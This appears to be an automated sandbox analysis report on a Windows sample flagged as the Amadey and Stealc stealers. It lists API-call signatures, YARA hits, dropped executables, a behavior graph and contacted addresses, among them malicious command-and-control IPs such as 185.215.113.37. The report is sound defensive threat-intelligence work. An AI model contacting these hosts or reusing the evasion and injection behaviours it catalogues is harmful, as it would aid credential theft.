Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 4_2_00067B90
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000113001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000113001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\1000115002\6b11689b40.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\1000115002\6b11689b40.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000140041\ko.ps1 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\1000115002\6b11689b40.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006AAA09 SetCurrentDirectoryA,GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,CreateFileA,InternetOpenA,InternetOpenUrlA,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,RemoveDirectoryA, 0_2_006AAA09
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006AB1A0 GetUserNameA, 0_2_006AB1A0
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006E2517 _free,_free,_free,GetTimeZoneInformation,_free, 0_2_006E2517
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006A7D30 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo, 0_2_006A7D30

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 4qIl08vrFY.exe, type: SAMPLE
Source: Yara match File source: 0.0.4qIl08vrFY.exe.6a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.skotes.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.skotes.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.skotes.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.skotes.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.skotes.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.skotes.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.4qIl08vrFY.exe.6a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.2031413122.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.2186715740.0000000000141000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4499620731.0000000000141000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2038559070.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2039119571.0000000000141000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.2041872696.0000000000141000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4499772578.0000000000141000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.2037585408.0000000000141000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, type: DROPPED
Yara detected Stealc
Source: Yara match File source: 4.0.num.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.num.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.6b11689b40.exe.be0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.6b11689b40.exe.be0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.6b11689b40.exe.be0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.2214014711.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2335410022.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2121570702.0000000000051000.00000080.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4503861250.0000000003ED5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2172652272.0000000005590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2212980719.0000000000BE1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2411328213.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2384037029.00000000013FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2452210924.000000000089B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.2108358478.0000000000051000.00000080.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2383087650.0000000000BE1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2453067018.0000000000BE1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2121787066.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2186829926.0000000003ED5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: num.exe PID: 1876, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 6b11689b40.exe PID: 1532, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\num[1].exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP

Remote Access Functionality
barindex
Yara detected Stealc
Source: Yara match File source: 4.0.num.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.num.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.6b11689b40.exe.be0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.6b11689b40.exe.be0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.6b11689b40.exe.be0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.2214014711.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2335410022.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2121570702.0000000000051000.00000080.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4503861250.0000000003ED5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2172652272.0000000005590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2212980719.0000000000BE1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2411328213.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2384037029.00000000013FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2452210924.000000000089B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.2108358478.0000000000051000.00000080.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2383087650.0000000000BE1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2453067018.0000000000BE1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2121787066.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2186829926.0000000003ED5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: num.exe PID: 1876, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 6b11689b40.exe PID: 1532, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\num[1].exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006CEC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 0_2_006CEC48
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006CDF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 0_2_006CDF51
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_0016EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 1_2_0016EC48
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_0016DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 1_2_0016DF51
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1522507 Sample: 4qIl08vrFY.exe Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 77 Multi AV Scanner detection for domain / URL 2->77 79 Suricata IDS alerts for network traffic 2->79 81 Found malware configuration 2->81 83 14 other signatures 2->83 8 skotes.exe 1 22 2->8         started        12 4qIl08vrFY.exe 5 2->12         started        15 6b11689b40.exe 2->15         started        17 2 other processes 2->17 process3 dnsIp4 63 185.215.113.43, 49704, 49705, 49708 WHOLESALECONNECTIONSNL Portugal 8->63 65 185.215.113.103, 49706, 49709, 49715 WHOLESALECONNECTIONSNL Portugal 8->65 67 google.com 8->67 43 C:\Users\user\AppData\Local\Temp\...\num.exe, PE32 8->43 dropped 45 C:\Users\user\AppData\Local\...\num[1].exe, PE32 8->45 dropped 47 C:\Users\user\AppData\Local\...\random[1].exe, PE32 8->47 dropped 53 2 other malicious files 8->53 dropped 19 6b11689b40.exe 13 8->19         started        22 num.exe 13 8->22         started        25 powershell.exe 12 8->25         started        27 skotes.exe 8->27         started        49 C:\Users\user\AppData\Local\...\skotes.exe, PE32 12->49 dropped 51 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 12->51 dropped 99 Contains functionality to inject code into remote processes 12->99 29 skotes.exe 12->29         started        101 Hides threads from debuggers 15->101 103 Tries to detect sandboxes / dynamic malware analysis system (registry check) 15->103 105 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 15->105 69 127.0.0.1 unknown unknown 17->69 file5 signatures6 process7 dnsIp8 85 Antivirus detection for dropped file 19->85 87 Multi AV Scanner detection for dropped file 19->87 89 Detected unpacking (changes PE section rights) 19->89 97 6 other signatures 19->97 61 185.215.113.37, 49707, 49711, 49742 WHOLESALECONNECTIONSNL Portugal 22->61 91 Machine Learning detection for dropped file 22->91 93 Found evasive API chain (may stop execution after checking locale) 22->93 95 Searches for specific processes (likely to inject) 22->95 31 chrome.exe 14 25->31         started        34 conhost.exe 25->34         started        signatures9 process10 dnsIp11 71 192.168.2.5, 137, 138, 443 unknown unknown 31->71 73 192.168.2.16 unknown unknown 31->73 75 2 other IPs or domains 31->75 36 chrome.exe 31->36         started        39 chrome.exe 31->39         started        41 chrome.exe 31->41         started        process12 dnsIp13 55 play.google.com 142.250.181.238, 443, 49762, 49763 GOOGLEUS United States 36->55 57 youtube.com 142.250.184.238, 443, 49725, 49758 GOOGLEUS United States 36->57 59 13 other IPs or domains 36->59
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
142.250.185.78
 unknown United States
15169 GOOGLEUS false
142.250.74.206
 unknown United States
15169 GOOGLEUS false
216.58.206.33
 googlehosted.l.googleusercontent.com United States
15169 GOOGLEUS false
142.250.181.238
 play.google.com United States
15169 GOOGLEUS false
142.250.185.142
 youtube-ui.l.google.com United States
15169 GOOGLEUS false
172.217.18.110
 www3.l.google.com United States
15169 GOOGLEUS false
142.250.74.196
 unknown United States
15169 GOOGLEUS false
142.250.186.78
 unknown United States
15169 GOOGLEUS false
185.215.113.37
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
142.250.185.132
 www.google.com United States
15169 GOOGLEUS false
239.255.255.250
 unknown Reserved
unknown unknown false
142.250.184.238
 youtube.com United States
15169 GOOGLEUS false
185.215.113.103
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false

Private

IP
192.168.2.16
192.168.2.6
192.168.2.5
127.0.0.1

Contacted Domains

Name IP Active
youtube-ui.l.google.com 142.250.185.142 true
google.com 216.58.206.46 true
www3.l.google.com 172.217.18.110 true
play.google.com 142.250.181.238 true
www.google.com 142.250.185.132 true
googlehosted.l.googleusercontent.com 216.58.206.33 true
youtube.com 142.250.184.238 true
clients2.googleusercontent.com unknown unknown
accounts.youtube.com unknown unknown
chrome.google.com unknown unknown
www.youtube.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://clients2.googleusercontent.com/crx/blobs/AY4GWKCjSWa8TD5HR0ssoNSHmv1DlGbxavvv4f4_vreCQV6o4JdgbhTns13WqVLfraA3idGD1YqVFdL1d29hUkKmBRQxeBB8OW5ZEZvDIDLLC0_H7OAK-03clOTMdE15SKgAxlKa5Za-otUDEb42n7phqLA20ygc_Y63/EFAIDNBMNNNIBPCAJPCGLCLEFINDMKAJ_24_9_1_1.crx false
    		unknown
    https://www.google.com/favicon.ico false
      		unknown
      https://clients2.googleusercontent.com/crx/blobs/AY4GWKDHKllS27BO_e8bCnbax_jg8ytdTG4Uzua5Kte91Msonmjt9Ssh1u4j53F3UYy-997sHknkzKEy9994XId3zBBDiju_YSunzv5QYwyL8XEx9VuF26n3JIgkmCYaLzIAxlKa5UdUDZoPCHdwU63c7rFT0JUxfsWG/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_82_1_0.crx false
        		unknown
        http://185.215.113.37/ true
        • URL Reputation: malware
        		 unknown